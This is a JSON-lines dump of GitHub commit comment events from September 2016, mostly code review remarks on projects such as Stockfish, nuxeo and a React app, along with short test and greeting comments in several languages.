{"id":"4518645663","type":"CommitCommentEvent","actor":{"login":"Accelarator36"},"repo":{"name":"Accelarator36/Labor-day-test"},"payload":{"comment":{"id":18904282,"position":null,"line":null,"path":null,"commit_id":"4be6891528f9e0fdf8d9b0c978555528289a32f7","created_at":"2016-09-06T00:05:54Z","updated_at":"2016-09-06T00:05:54Z","body":"It is going to be a blessing advancing in my career."}},"created_at":"2016-09-06T00:05:54Z"}
{"id":"4518647846","type":"CommitCommentEvent","actor":{"login":"tioback"},"repo":{"name":"lizarusi/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18904287,"position":4,"line":79,"path":"index.js","commit_id":"22bcd0004168e2de62de5ac5c5713d4ac2c462e7","created_at":"2016-09-06T00:07:22Z","updated_at":"2016-09-06T00:07:22Z","body":"How is this working for you?"}},"created_at":"2016-09-06T00:07:22Z"}
{"id":"4518647983","type":"CommitCommentEvent","actor":{"login":"Kali-"},"repo":{"name":"sonyxperiadev/device-sony-karin_windy"},"payload":{"comment":{"id":18904288,"position":null,"line":null,"path":null,"commit_id":"fb2c3713c8887ce62c1c019045712ab858555438","created_at":"2016-09-06T00:07:26Z","updated_at":"2016-09-06T00:07:26Z","body":"too much tired for test, but i guess this is missing\r\n\r\nhttps://github.com/sonyxperiadev/kernel/commit/53ffd38ba9381fac5e5777ab09453b52d0785164"}},"created_at":"2016-09-06T00:07:26Z"}
{"id":"4518648618","type":"CommitCommentEvent","actor":{"login":"tioback"},"repo":{"name":"lizarusi/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18904290,"position":36,"line":143,"path":"index.js","commit_id":"22bcd0004168e2de62de5ac5c5713d4ac2c462e7","created_at":"2016-09-06T00:07:55Z","updated_at":"2016-09-06T00:07:55Z","body":"How is this scrolling part working for you?"}},"created_at":"2016-09-06T00:07:55Z"}
{"id":"4518649313","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18904291,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-06T00:08:23Z","updated_at":"2016-09-06T00:08:23Z","body":"Good luck @jcalovski! If this passes LTC I would like to try something like this (could be improved!) after line 765:\r\n```\r\n        else if (pos.count<PAWN>(~strongSide) - pos.count<PAWN>(strongSide) >= 2)\r\n            sf = ScaleFactor(40 + 4 * pos.count<PAWN>(strongSide));\r\n```"}},"created_at":"2016-09-06T00:08:23Z"}
{"id":"4518650981","type":"CommitCommentEvent","actor":{"login":"zaffudo"},"repo":{"name":"zaffudo/CAH-Generator"},"payload":{"comment":{"id":18904292,"position":null,"line":null,"path":null,"commit_id":"ca38b2de92f0b721d8685466f88e533b73bcf747","created_at":"2016-09-06T00:09:32Z","updated_at":"2016-09-06T00:09:32Z","body":"150x150 png's with either a white or transparent background. You can email\nthem to me, or attach them to the project and I'll get them added as\nquickly as I can\n\nOn Mon, Aug 29, 2016 at 4:49 PM, kasekesy <notifications@github.com> wrote:\n\n> how would you need me to do it ill give it a shot and see what I can do\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/zaffudo/CAH-Generator/commit/ca38b2de92f0b721d8685466f88e533b73bcf747#commitcomment-18822222>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADoQUVCzDsbFBMQibKtsI774KUSjh3zuks5qk3AOgaJpZM4Ju2x6>\n> .\n>\n"}},"created_at":"2016-09-06T00:09:32Z"}
{"id":"4518654911","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18904296,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-06T00:12:08Z","updated_at":"2016-09-06T00:12:08Z","body":"Yes, we could try to tweak mobility!\n\nAnyway; http://tests.stockfishchess.org/tests/view/57ce047d0ebc59030fbe4f47 \n(back to islands while groups await for optimization!)\n"}},"created_at":"2016-09-06T00:12:08Z"}
{"id":"4518656872","type":"CommitCommentEvent","actor":{"login":"Accelarator36"},"repo":{"name":"Accelarator36/Labor-day-test-2"},"payload":{"comment":{"id":18904298,"position":null,"line":null,"path":null,"commit_id":"f477df174ef520cced413af031c031e251a9c32a","created_at":"2016-09-06T00:13:32Z","updated_at":"2016-09-06T00:13:32Z","body":"I'm grateful"}},"created_at":"2016-09-06T00:13:32Z"}
{"id":"4518658375","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18904300,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T00:14:31Z","updated_at":"2016-09-06T00:14:31Z","body":"@zhangzaki \r\nPlease send me your xtrabackup commands step by step.\r\nThanks."}},"created_at":"2016-09-06T00:14:31Z"}
{"id":"4518661406","type":"CommitCommentEvent","actor":{"login":"rasel572"},"repo":{"name":"alibaba/weex"},"payload":{"comment":{"id":18904305,"position":null,"line":null,"path":null,"commit_id":"c66681125b6ce6508f66371d97fbd552064f0ea6","created_at":"2016-09-06T00:16:25Z","updated_at":"2016-09-06T00:16:25Z","body":"c666811"}},"created_at":"2016-09-06T00:16:25Z"}
{"id":"4518661680","type":"CommitCommentEvent","actor":{"login":"lmmx"},"repo":{"name":"lmmx/shots"},"payload":{"comment":{"id":18904306,"position":null,"line":null,"path":null,"commit_id":"8e42eadf2525462ebdfb55991d6ab43d21475ac7","created_at":"2016-09-06T00:16:36Z","updated_at":"2016-09-06T00:16:36Z","body":"citation: Meiklejohn, C., & Van Roy, P. (2015, September). Selective Hearing: An Approach to Distributed, Eventually Consistent Edge Computation. In Reliable Distributed Systems Workshop (SRDSW), 2015 IEEE 34th Symposium on (pp. 62-67). IEEE."}},"created_at":"2016-09-06T00:16:36Z"}
{"id":"4518663593","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18904310,"position":null,"line":null,"path":null,"commit_id":"80193fd26a32c399d2ef9da815766564be886339","created_at":"2016-09-06T00:17:58Z","updated_at":"2016-09-06T00:17:58Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aF1rNpoqTiS1Pb37-uo0TQ"}},"created_at":"2016-09-06T00:17:58Z"}
{"id":"4518663987","type":"CommitCommentEvent","actor":{"login":"jaka2015"},"repo":{"name":"vindo-app/vindo-app.github.io"},"payload":{"comment":{"id":18904311,"position":null,"line":null,"path":null,"commit_id":"d3bc0bc1c6d660ec04f796a1010cdce5c9b75f7a","created_at":"2016-09-06T00:18:12Z","updated_at":"2016-09-06T00:18:12Z","body":"great name 😂"}},"created_at":"2016-09-06T00:18:12Z"}
{"id":"4518666738","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18904320,"position":100,"line":94,"path":"app/build.gradle","commit_id":"dc9db6d917f54d312b9604eeeb54a6cee10d27bf","created_at":"2016-09-06T00:19:55Z","updated_at":"2016-09-06T00:19:55Z","body":"Why? I've removed this earlier, I don't get why have GoIV Offline 3.1.0 Offline."}},"created_at":"2016-09-06T00:19:55Z"}
{"id":"4518669909","type":"CommitCommentEvent","actor":{"login":"almet"},"repo":{"name":"n1k0/nicolas.perriault.net"},"payload":{"comment":{"id":18904327,"position":4,"line":7,"path":"templates/index.html","commit_id":"4515076972998535180b2d2bea3eeae90f5d3a7b","created_at":"2016-09-06T00:21:49Z","updated_at":"2016-09-06T00:21:49Z","body":"Spotted!"}},"created_at":"2016-09-06T00:21:49Z"}
{"id":"4518670639","type":"CommitCommentEvent","actor":{"login":"pyrodie18"},"repo":{"name":"pyrodie18/Bro-Analysis"},"payload":{"comment":{"id":18904329,"position":null,"line":null,"path":null,"commit_id":"8563171d3462d4a0470c75e480eb1c2daa989d4a","created_at":"2016-09-06T00:22:13Z","updated_at":"2016-09-06T00:22:13Z","body":"Used to complete issue [5](https://github.com/pyrodie18/Bro-Analysis/issues/5)"}},"created_at":"2016-09-06T00:22:13Z"}
{"id":"4518673910","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18904339,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-06T00:24:22Z","updated_at":"2016-09-06T00:24:22Z","body":"Another way to count the islands is, after the last pawn loop, \r\nb = e->semiopenFiles[Us];  \r\ne->islands[Us] = popcount(b & ~(b >> 1)); \r\n"}},"created_at":"2016-09-06T00:24:22Z"}
{"id":"4518676548","type":"CommitCommentEvent","actor":{"login":"ginajimenezc"},"repo":{"name":"ginajimenezc/Curriculum-Vitae"},"payload":{"comment":{"id":18904341,"position":null,"line":null,"path":null,"commit_id":"2114898e10f647f3205e40a069a20a2fe2fce9f9","created_at":"2016-09-06T00:26:03Z","updated_at":"2016-09-06T00:26:03Z","body":"[GINA MARGARITA JIMENEZ](url)"}},"created_at":"2016-09-06T00:26:03Z"}
{"id":"4518677986","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":18904344,"position":null,"line":null,"path":null,"commit_id":"e569218aa8b820f12cdf01c700882e9995f49a9e","created_at":"2016-09-06T00:27:01Z","updated_at":"2016-09-06T00:27:01Z","body":"does this not introduce ambiguity about the source of rain data when calculating rain rate?\r\n\r\nfor example, what happens when you get rain events from archive records (from the logger), then you start getting rain events from loop data (because record_generation=software)?  before this pr, there would be no rainRate for archive data from the logger, then there would be rainRate as long as weewx is reading live. after this pr, there will be rainRate for both sources (this might not be a bad thing!)\r\n\r\nor what happens when record_generation=hardware?  before this pr, there would be no rainRate.  after this pr, there will be rainRate (which is probably not a bad thing!)\r\n\r\nthis code is trying to do the right thing, but it smells bad.  unfortunately, i'm not sure how to clean it up."}},"created_at":"2016-09-06T00:27:01Z"}
{"id":"4518683052","type":"CommitCommentEvent","actor":{"login":"sajiaghias6"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18904350,"position":2,"line":2,"path":"additional_install_files/libs32r/.gitignore","commit_id":"5c597102f2196626db99305aebdccd296d9705d9","created_at":"2016-09-06T00:30:08Z","updated_at":"2016-09-06T00:30:08Z","body":"loop \r\n"}},"created_at":"2016-09-06T00:30:08Z"}
{"id":"4518683935","type":"CommitCommentEvent","actor":{"login":"sajiaghias6"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18904352,"position":14,"line":100,"path":"cmake/Modules/ObsHelpers.cmake","commit_id":"5c597102f2196626db99305aebdccd296d9705d9","created_at":"2016-09-06T00:30:32Z","updated_at":"2016-09-06T00:30:32Z","body":"Loop 1"}},"created_at":"2016-09-06T00:30:32Z"}
{"id":"4518684587","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18904354,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-06T00:30:55Z","updated_at":"2016-09-06T00:30:55Z","body":"Mmh I know, and maybe it would be faster even with soft popcount...\n"}},"created_at":"2016-09-06T00:30:55Z"}
{"id":"4518692689","type":"CommitCommentEvent","actor":{"login":"m4reana"},"repo":{"name":"m4reana/Provas_Resolvidas"},"payload":{"comment":{"id":18904363,"position":10,"line":10,"path":"README.md","commit_id":"502288b8b36283ebed456018a5672895d6c00f96","created_at":"2016-09-06T00:35:47Z","updated_at":"2016-09-06T00:35:47Z","body":"tem uma mensagem de commit que era pra ser \"testes\"*******"}},"created_at":"2016-09-06T00:35:47Z"}
{"id":"4518692870","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904364,"position":25,"line":14,"path":"src/ProjectGridFilter.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:35:54Z","updated_at":"2016-09-06T00:35:54Z","body":"in csv-simple-search, we decided it was better to bind all the handlers in the constructer, oh like what happens in `App.js`"}},"created_at":"2016-09-06T00:35:54Z"}
{"id":"4518693490","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904366,"position":11,"line":8,"path":"src/ProjectGridItem.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:36:15Z","updated_at":"2016-09-06T00:36:15Z","body":"tidied this up to pass lint: https://github.com/DevProgress/projects/commit/2fa6075484ad93ffd331c6b97489e3d5e9be7b23"}},"created_at":"2016-09-06T00:36:15Z"}
{"id":"4518698172","type":"CommitCommentEvent","actor":{"login":"ginajimenezc"},"repo":{"name":"ginajimenezc/Curriculum-Vitae"},"payload":{"comment":{"id":18904370,"position":1,"line":1,"path":"README.md","commit_id":"2114898e10f647f3205e40a069a20a2fe2fce9f9","created_at":"2016-09-06T00:39:21Z","updated_at":"2016-09-06T00:39:21Z","body":"INGENIERA ELECTRONICA"}},"created_at":"2016-09-06T00:39:21Z"}
{"id":"4518698256","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904371,"position":1,"line":1,"path":"src/Dispatcher.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:39:25Z","updated_at":"2016-09-06T00:39:25Z","body":"fwiw, i think most people prefer [`redux`](https://github.com/reactjs/redux) as a flux implementation. just sayin', if you want to learn react, it's worth checking out"}},"created_at":"2016-09-06T00:39:25Z"}
{"id":"4518699955","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904378,"position":4,"line":8,"path":"src/ProjectGrid.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:40:21Z","updated_at":"2016-09-06T00:40:21Z","body":"i prefer `const` to `var` these days, or `let` if you must 😉"}},"created_at":"2016-09-06T00:40:21Z"}
{"id":"4518700896","type":"CommitCommentEvent","actor":{"login":"sambozek"},"repo":{"name":"oboechick/DSI-SF-2-oboechick"},"payload":{"comment":{"id":18904381,"position":null,"line":null,"path":null,"commit_id":"996c0165ad1c33a50acd987440a95d521887a0e5","created_at":"2016-09-06T00:40:45Z","updated_at":"2016-09-06T00:40:45Z","body":"The start was very promising, but you may have been a little too ambitious. Your explanation of the data was good, but you didn’t express what your topic of investigation was. I would suggest reading on how to write a [data dictionary](http://www.pnamp.org/sites/default/files/best_practices_for_data_dictionary_definitions_and_usage_version_1.1_2006-11-14.pdf). \r\nI see that you ran out of time, but in the future it is really worth going through and just writing up pseudocode on what your next steps would be. Document why your data was so hard to clean and wrangle. Was it because there was a lot of incomplete data? Or was it too unwieldy given the tools you know how to use? Is it not data that lends well to regression? Documenting what went wrong is an important skill. \r\nDo go through the solutions and follow them with perhaps a simpler data set. Understand why the data you chose wasn’t the best for a regression analysis, and when data can be analyzed with linear techniques."}},"created_at":"2016-09-06T00:40:45Z"}
{"id":"4518701773","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904382,"position":7,"line":7,"path":"src/ProjectGridStore.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:41:08Z","updated_at":"2016-09-06T00:41:08Z","body":"might as well be const, right? it shouldn't change"}},"created_at":"2016-09-06T00:41:08Z"}
{"id":"4518703272","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904385,"position":7,"line":7,"path":"src/ProjectGridStore.js","commit_id":"a2d3fe8cfc7755a875814dd0c671ec25e5a6a902","created_at":"2016-09-06T00:42:04Z","updated_at":"2016-09-06T00:42:04Z","body":"err, shouldn't be reassigned, it does mutate, but `const` just stops reassignment."}},"created_at":"2016-09-06T00:42:04Z"}
{"id":"4518708939","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18904392,"position":5,"line":224,"path":"components/pedigree/resources/src/main/resources/pedigree/model/dynamicGraph.js","commit_id":"f4b075f7a97b1cd9cf969c84726c5e40623b2ac8","created_at":"2016-09-06T00:45:13Z","updated_at":"2016-09-06T00:45:13Z","body":"Are you sure about this change? Genes are normally stored in the patient record."}},"created_at":"2016-09-06T00:45:13Z"}
{"id":"4518709470","type":"CommitCommentEvent","actor":{"login":"samuelcole"},"repo":{"name":"DevProgress/projects"},"payload":{"comment":{"id":18904393,"position":54,"line":54,"path":"package.json","commit_id":"f4552b7cadbbbe6ccfbb343605b682de80224dca","created_at":"2016-09-06T00:45:29Z","updated_at":"2016-09-06T00:45:29Z","body":"why alpha? just to get to bootstrap 4?\r\n\r\n(i don't have any background on bootstrap at all, so i'm just curious)"}},"created_at":"2016-09-06T00:45:29Z"}
{"id":"4518710633","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18904394,"position":28,"line":27,"path":"content/contributing/core-team/contents.lr","commit_id":"68f2dfd308a52492df037959c5905a1f0d3eabe4","created_at":"2016-09-06T00:46:13Z","updated_at":"2016-09-06T00:46:13Z","body":"Bee-rigadier? Senior apiarist? Knight/Dame of the Most Reverend Order of the Hive :-)"}},"created_at":"2016-09-06T00:46:13Z"}
{"id":"4518712091","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":18904397,"position":26,"line":22,"path":"distributor.py","commit_id":"0eb6f423089287f29e241cc967701885aadbf976","created_at":"2016-09-06T00:47:09Z","updated_at":"2016-09-06T00:47:09Z","body":"you can rename this to add() or save(), since it's clear from the context of this class that this is a Distributor"}},"created_at":"2016-09-06T00:47:09Z"}
{"id":"4518713606","type":"CommitCommentEvent","actor":{"login":"qq806350554"},"repo":{"name":"qq806350554/node"},"payload":{"comment":{"id":18904400,"position":null,"line":null,"path":null,"commit_id":"80e11205c5eb80a06ed88c52d4fe08bc827bd2e8","created_at":"2016-09-06T00:48:10Z","updated_at":"2016-09-06T00:48:10Z","body":"怎么提交不上去呀"}},"created_at":"2016-09-06T00:48:10Z"}
{"id":"4518716177","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":18904405,"position":27,"line":23,"path":"distributor.py","commit_id":"0eb6f423089287f29e241cc967701885aadbf976","created_at":"2016-09-06T00:49:47Z","updated_at":"2016-09-06T00:49:47Z","body":"this applies to both this and the other class, but you might want to separate this bit to another class, maybe db.py where you'd be able to get a handle on the database -- ideally you'd also be able to pass that a statement and it would manage the connection for you"}},"created_at":"2016-09-06T00:49:47Z"}
{"id":"4518716346","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"hiroki-fujihara/ToDoList2"},"payload":{"comment":{"id":18904406,"position":null,"line":null,"path":null,"commit_id":"52e8bb8afb3732fa5d60f8aaca0533f2cb71e31f","created_at":"2016-09-06T00:49:54Z","updated_at":"2016-09-06T00:49:54Z","body":"期限ぎりぎりですみませんですた。"}},"created_at":"2016-09-06T00:49:54Z"}
{"id":"4518718194","type":"CommitCommentEvent","actor":{"login":"myeveryone"},"repo":{"name":"myeveryone/firstRespository"},"payload":{"comment":{"id":18904408,"position":null,"line":null,"path":null,"commit_id":"60f2e57398c414f7a4bff7b4fdf9113fb4cb2765","created_at":"2016-09-06T00:51:01Z","updated_at":"2016-09-06T00:51:01Z","body":"今天天气不错了。。。"}},"created_at":"2016-09-06T00:51:01Z"}
{"id":"4518718779","type":"CommitCommentEvent","actor":{"login":"myeveryone"},"repo":{"name":"myeveryone/firstRespository"},"payload":{"comment":{"id":18904409,"position":null,"line":null,"path":null,"commit_id":"60f2e57398c414f7a4bff7b4fdf9113fb4cb2765","created_at":"2016-09-06T00:51:23Z","updated_at":"2016-09-06T00:51:23Z","body":"今天是周二"}},"created_at":"2016-09-06T00:51:23Z"}
{"id":"4518720246","type":"CommitCommentEvent","actor":{"login":"LLendario"},"repo":{"name":"Infouniron/AulaGit"},"payload":{"comment":{"id":18904411,"position":6,"line":8,"path":"index.html","commit_id":"4c7bc6f79eb0d427b0122c10248a7eda32d08dcf","created_at":"2016-09-06T00:52:15Z","updated_at":"2016-09-06T00:52:15Z","body":"<p>Hello World</p>"}},"created_at":"2016-09-06T00:52:15Z"}
{"id":"4518720892","type":"CommitCommentEvent","actor":{"login":"YgorRibeiro"},"repo":{"name":"joaovictorr/The-Last-Choice-Projeto-Integrador---UNIPAM-2016-"},"payload":{"comment":{"id":18904413,"position":28,"line":28,"path":".gitignore","commit_id":"db1ce9d115ea6c95ae96b3f81d7cbfdfaf22cb0d","created_at":"2016-09-06T00:52:39Z","updated_at":"2016-09-06T00:52:39Z","body":"asdasd"}},"created_at":"2016-09-06T00:52:39Z"}
{"id":"4518721815","type":"CommitCommentEvent","actor":{"login":"neo-existenz"},"repo":{"name":"neo-existenz/hello-world"},"payload":{"comment":{"id":18904414,"position":null,"line":null,"path":null,"commit_id":"3387e98bf9e8d8df8d3bdeb6e65a10585dca599c","created_at":"2016-09-06T00:53:12Z","updated_at":"2016-09-06T00:53:12Z","body":"first addition with README.md edits."}},"created_at":"2016-09-06T00:53:12Z"}
{"id":"4518723189","type":"CommitCommentEvent","actor":{"login":"neo-existenz"},"repo":{"name":"neo-existenz/hello-world"},"payload":{"comment":{"id":18904416,"position":2,"line":2,"path":"README.md","commit_id":"3387e98bf9e8d8df8d3bdeb6e65a10585dca599c","created_at":"2016-09-06T00:53:59Z","updated_at":"2016-09-06T00:53:59Z","body":"original readme information"}},"created_at":"2016-09-06T00:53:59Z"}
{"id":"4518724879","type":"CommitCommentEvent","actor":{"login":"YgorRibeiro"},"repo":{"name":"joaovictorr/The-Last-Choice-Projeto-Integrador---UNIPAM-2016-"},"payload":{"comment":{"id":18904417,"position":8,"line":8,"path":"README.md","commit_id":"4e6879677b981ab638cf4dfbc5d5cc1e57f6b427","created_at":"2016-09-06T00:54:58Z","updated_at":"2016-09-06T00:54:58Z","body":";"}},"created_at":"2016-09-06T00:54:58Z"}
{"id":"4518725578","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904418,"position":14,"line":83,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoConnectionManagerConfiguration.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:55:21Z","updated_at":"2016-09-06T00:55:21Z","body":"Also add this to the copy constructor and merge method."}},"created_at":"2016-09-06T00:55:21Z"}
{"id":"4518725689","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":18904419,"position":null,"line":null,"path":null,"commit_id":"0eb6f423089287f29e241cc967701885aadbf976","created_at":"2016-09-06T00:55:25Z","updated_at":"2016-09-06T00:55:25Z","body":"Small issue: variable names in python are snake_cased, not camelCased -- better to address that now.\r\n\r\nLarger issue: I don't think it's a good idea to have all those input(...) calls as part of the Film class, since maybe you'd want to be able to interact with that class at any point in your program without resorting to command line calls - I'd think about separating that part of the program (you could even leave it in that file for now)\r\n\r\n"}},"created_at":"2016-09-06T00:55:25Z"}
{"id":"4518727766","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18904421,"position":28,"line":27,"path":"content/contributing/core-team/contents.lr","commit_id":"68f2dfd308a52492df037959c5905a1f0d3eabe4","created_at":"2016-09-06T00:56:36Z","updated_at":"2016-09-06T00:56:36Z","body":"In all seriousness - the actual name doesn't matter *that* much. However, the power structure that is implied by the name does (part of the whole implied meanings behind words etc). "}},"created_at":"2016-09-06T00:56:36Z"}
{"id":"4518729002","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904422,"position":146,"line":808,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:57:17Z","updated_at":"2016-09-06T00:57:17Z","body":"Use a named constant for clarity"}},"created_at":"2016-09-06T00:57:17Z"}
{"id":"4518729760","type":"CommitCommentEvent","actor":{"login":"glasnt"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18904426,"position":28,"line":27,"path":"content/contributing/core-team/contents.lr","commit_id":"68f2dfd308a52492df037959c5905a1f0d3eabe4","created_at":"2016-09-06T00:57:45Z","updated_at":"2016-09-06T00:57:45Z","body":"Given you're also 'Founding Apiarist', I think 'Senior Apiarist' works best out of these options. "}},"created_at":"2016-09-06T00:57:45Z"}
{"id":"4518730181","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904428,"position":133,"line":803,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:58:01Z","updated_at":"2016-09-06T00:58:01Z","body":"int"}},"created_at":"2016-09-06T00:58:01Z"}
{"id":"4518730264","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904429,"position":136,"line":805,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:58:05Z","updated_at":"2016-09-06T00:58:05Z","body":"int"}},"created_at":"2016-09-06T00:58:05Z"}
{"id":"4518731853","type":"CommitCommentEvent","actor":{"login":"RiTu1337"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":18904432,"position":4,"line":169,"path":"src/Instagram.php","commit_id":"d62b09651b7db0b0f0e77eaf669cb406348f6c36","created_at":"2016-09-06T00:58:57Z","updated_at":"2016-09-06T00:58:57Z","body":"This returns \"Not logged in\" from the http->request on a fresh account."}},"created_at":"2016-09-06T00:58:57Z"}
{"id":"4518732073","type":"CommitCommentEvent","actor":{"login":"adammenges"},"repo":{"name":"opendeep/opendeep"},"payload":{"comment":{"id":18904433,"position":262,"line":261,"path":"LICENSE","commit_id":"d77c77a87ce79bc5ecdd5abb6f865af9cf867144","created_at":"2016-09-06T00:59:04Z","updated_at":"2016-09-06T00:59:04Z","body":"?"}},"created_at":"2016-09-06T00:59:04Z"}
{"id":"4518732609","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904434,"position":81,"line":768,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:59:23Z","updated_at":"2016-09-06T00:59:23Z","body":"Probably an ArrayList is better now, no?"}},"created_at":"2016-09-06T00:59:23Z"}
{"id":"4518733041","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904435,"position":169,"line":827,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T00:59:36Z","updated_at":"2016-09-06T00:59:36Z","body":"Remove hashCode and equals if not needed if we're using a List."}},"created_at":"2016-09-06T00:59:36Z"}
{"id":"4518733573","type":"CommitCommentEvent","actor":{"login":"Hambrook"},"repo":{"name":"Hambrook/Syn"},"payload":{"comment":{"id":18904436,"position":null,"line":null,"path":null,"commit_id":"895af2ef47c0478d4c64c033b6f8e05e67ef60d8","created_at":"2016-09-06T00:59:55Z","updated_at":"2016-09-06T00:59:55Z","body":"Closes #1"}},"created_at":"2016-09-06T00:59:55Z"}
{"id":"4518734100","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18904437,"position":229,"line":876,"path":"nuxeo-runtime/nuxeo-runtime-jtajca/src/main/java/org/nuxeo/runtime/jtajca/NuxeoContainer.java","commit_id":"ca900847bad8823eded9f52aa1400423adff4b42","created_at":"2016-09-06T01:00:12Z","updated_at":"2016-09-06T01:00:12Z","body":"setUnshareable(noSharingHolder.get() != null)"}},"created_at":"2016-09-06T01:00:12Z"}
{"id":"4518738855","type":"CommitCommentEvent","actor":{"login":"rcuhljr"},"repo":{"name":"rcuhljr/dr-lich"},"payload":{"comment":{"id":18904444,"position":null,"line":null,"path":null,"commit_id":"e308ef8baf3aa4f5e6e5c24490cec0359fdb7fbd","created_at":"2016-09-06T01:02:33Z","updated_at":"2016-09-06T01:02:33Z","body":"Is line stripped at this point from line breaks?"}},"created_at":"2016-09-06T01:02:33Z"}
